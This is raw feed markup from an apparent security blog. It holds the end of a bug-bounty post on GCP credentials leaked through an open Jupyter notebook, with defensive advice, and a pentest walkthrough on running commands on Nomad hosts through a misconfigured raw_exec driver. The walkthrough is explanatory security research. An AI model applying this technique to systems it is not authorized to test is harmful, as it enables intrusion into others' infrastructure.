yo\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\n\u003Ctable cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ\/s1600\/Screen+Shot+2020-03-13+at+10.23.57+PM.png\" imageanchor=\"1\" style=\"clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"728\" data-original-width=\"1230\" height=\"189\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ\/s320\/Screen+Shot+2020-03-13+at+10.23.57+PM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EI love payments tables\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\nAlong the way I searched who this company was.\u0026nbsp;\u0026nbsp;\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia\"\u003Ehttps:\/\/en.wikipedia.org\/wiki\/Tokopedia\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nMost interestingly...\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003EIn 2017, Tokopedia received $1.1 billion investment from Chinese e-commerce giant Alibaba.\u003C\/span\u003E\u003Csup 
class=\"reference\" id=\"cite_ref-7\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-7\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[7]\u003C\/a\u003E\u003C\/sup\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Again in 2018, the company secured $1.1 billion funding round led by Chinese e-commerce giant\u0026nbsp;\u003C\/span\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Alibaba_Group\" style=\"background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;\" title=\"Alibaba Group\"\u003EAlibaba Group\u003C\/a\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Holding and Japan's\u0026nbsp;\u003C\/span\u003E\u003Ca class=\"mw-redirect\" href=\"https:\/\/en.wikipedia.org\/wiki\/SoftBank\" style=\"background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;\" title=\"SoftBank\"\u003ESoftBank\u003C\/a\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Group\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-8\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-8\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[8]\u003C\/a\u003E\u003C\/sup\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;putting its valuation to about $7B.\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-9\" style=\"background-color: white; color: #222222; font-family: 
sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-9\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[9]\u003C\/a\u003E\u003C\/sup\u003E\u003C\/blockquote\u003E\nSo being a good person (tm) I reported the issue and it was assigned a critical severity. They fixed it super quickly and the team was decently responsive until it was fixed. After that it took 2 weeks to get information on the bounty. I promptly provided payment info, but I was never paid and they have stopped responding to my inquiries.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cb\u003ESolutions:\u003C\/b\u003E\u003Cbr \/\u003E\nRun the notebook in a limited privilege container (this doesn't protect against a cloud metadata attack)\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nNew versions of Jupyter notebook allow for password protecting access. Do that instead of leaving it open to all\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nDon't leave service account keys in the notebook folders or in notebook error output, that is how the credentials were exposed here"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2552988186359746960\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/2552988186359746960","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2552988186359746960"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2552988186359746960"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2020\/03\/what-is-your-gcp-infra-worthabout-700.html","title":"What is your GCP infra worth?...about ~$700 
[Bugbounty]"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0\/s72-c\/notebooks-main-page.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-1555777666843031796"},"published":{"$t":"2019-12-16T11:43:00.000-05:00"},"updated":{"$t":"2019-12-16T12:45:22.538-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Devoops: Nomad with raw_exec enabled"},"content":{"type":"html","$t":"\"Nomad is a flexible container orchestration tool that enables an organization to \neasily deploy and manage any containerized or legacy application using a single, \nunified workflow. 
Nomad can run a diverse workload of Docker, non-containerized, \nmicroservice, and batch applications, and generally offers the following benefits \nto developers and operators...\"\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nfrom:\u0026nbsp;\u003Ca href=\"https:\/\/www.nomadproject.io\/intro\/index.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/intro\/index.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTo get a feel for where it fits in the HashiCorp ecosphere take a look at the following graphic:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY\/s1600\/Screen+Shot+2018-12-18+at+10.57.58+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"534\" data-original-width=\"1600\" height=\"132\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY\/s400\/Screen+Shot+2018-12-18+at+10.57.58+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nI'd like to thank \u003Ca href=\"https:\/\/twitter.com\/willbtlr\" target=\"_blank\"\u003EWill Butler\u003C\/a\u003E for letting me write this up after watching him pwn it.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nYou can get a dev environment up and running using the tutorial here:\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.nomadproject.io\/intro\/getting-started\/install.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/intro\/getting-started\/install.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThe walkthru has you run it as a dev environment which 
won't bind to 0.0.0.0 (dev mode listens on loopback only), so you'll need the following server and client files to get an appropriate environment up and running after you Vagrant up.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nserver:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/ce4296137414bd16fcca0818208b39b7\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/ce4296137414bd16fcca0818208b39b7\u003C\/a\u003E\u003Cbr \/\u003E\nclient1:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/4abde0ee31f4d730019e6fa04ef6d3b6\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/4abde0ee31f4d730019e6fa04ef6d3b6\u003C\/a\u003E\u003Cbr \/\u003E\nclient2:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/a4399019a943862e57283c29994ce5da\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/a4399019a943862e57283c29994ce5da\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nIf you get everything up and running correctly you should be able to connect to the UI on port 4646 and see the example job\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E$ nomad job run example.nomad\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E==\u0026gt; Monitoring evaluation \"ac9b4b08\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation triggered by job \"example\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation within deployment: \"8a7dfe0f\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EAllocation \"57e65abe\" created: node 
\"a15034e5\", group \"cache\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation status changed: \"pending\" -\u0026gt; \"complete\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f4f4f4; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E\n\n\n\n\n\n\n\n\n\u003Cbr \/\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E==\u0026gt; Evaluation \"ac9b4b08\" finished with status \"complete\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY\/s1600\/Screen+Shot+2018-12-18+at+11.10.44+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"494\" data-original-width=\"1600\" height=\"122\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY\/s400\/Screen+Shot+2018-12-18+at+11.10.44+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\njobs in the nomad UI\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca 
href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4\/s1600\/Screen+Shot+2018-12-18+at+11.11.03+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"481\" data-original-width=\"1600\" height=\"120\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4\/s400\/Screen+Shot+2018-12-18+at+11.11.03+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nservers in the nomad UI\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI\/s1600\/Screen+Shot+2018-12-18+at+11.10.56+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"490\" data-original-width=\"1600\" height=\"121\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI\/s400\/Screen+Shot+2018-12-18+at+11.10.56+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nclients in the nomad UI\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003E\u003Cbr 
\/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003ELeveraging misconfiguration time. Nomad ships with a raw_exec option that is disabled by default.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nref: \u003Ca href=\"https:\/\/www.nomadproject.io\/docs\/drivers\/raw_exec.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/docs\/drivers\/raw_exec.html\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nthe raw_exec option allows you to run a command outside isolation on the nomad host, as the same user the Nomad client process runs as.\u0026nbsp;\u0026nbsp;\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\"The \u003Ccode\u003Eraw_exec\u003C\/code\u003E driver can run on all supported operating systems. For security\nreasons, it is disabled by default. 
To enable raw exec, the Nomad client\nconfiguration must explicitly enable the \u003Ccode\u003Eraw_exec\u003C\/code\u003E driver in the client's\n\u003Ca href=\"https:\/\/www.nomadproject.io\/docs\/configuration\/client.html#options\" target=\"_blank\"\u003Eoptions\u003C\/a\u003E:\"\u003C\/div\u003E\n\u003Cbr \/\u003E\nHow can you see if the raw_exec driver is enabled on the clients?\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nYou can check it out in the UI:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY\/s1600\/Screen+Shot+2018-12-18+at+11.16.07+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"940\" data-original-width=\"1600\" height=\"233\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY\/s400\/Screen+Shot+2018-12-18+at+11.16.07+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nor by hitting the API endpoint\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8\/s1600\/Screen+Shot+2018-12-18+at+11.19.58+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 
1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"730\" data-original-width=\"1600\" height=\"181\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8\/s400\/Screen+Shot+2018-12-18+at+11.19.58+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nLet's exploit this thing.\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nWe need to create a job hcl file with our commands. 
Here is a gist with a simple one:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/25b391126dadefe0a9523fb421bf8f33\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/25b391126dadefe0a9523fb421bf8f33\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo\/s1600\/Screen+Shot+2018-12-18+at+11.23.36+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"240\" data-original-width=\"1600\" height=\"94\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo\/s640\/Screen+Shot+2018-12-18+at+11.23.36+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nstarting the service\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca 
href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4\/s1600\/Screen+Shot+2018-12-18+at+11.23.56+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"178\" data-original-width=\"1426\" height=\"78\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4\/s640\/Screen+Shot+2018-12-18+at+11.23.56+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nResults of our job\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok\/s1600\/Screen+Shot+2018-12-18+at+11.26.22+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"348\" data-original-width=\"1600\" height=\"86\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok\/s400\/Screen+Shot+2018-12-18+at+11.26.22+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\njob in the UI\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: 
center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg\/s1600\/Screen+Shot+2018-12-18+at+11.27.17+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"167\" data-original-width=\"1600\" height=\"66\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg\/s640\/Screen+Shot+2018-12-18+at+11.27.17+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nStopping the job\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ\/s1600\/Screen+Shot+2018-12-18+at+11.24.30+AM.png\" imageanchor=\"1\" 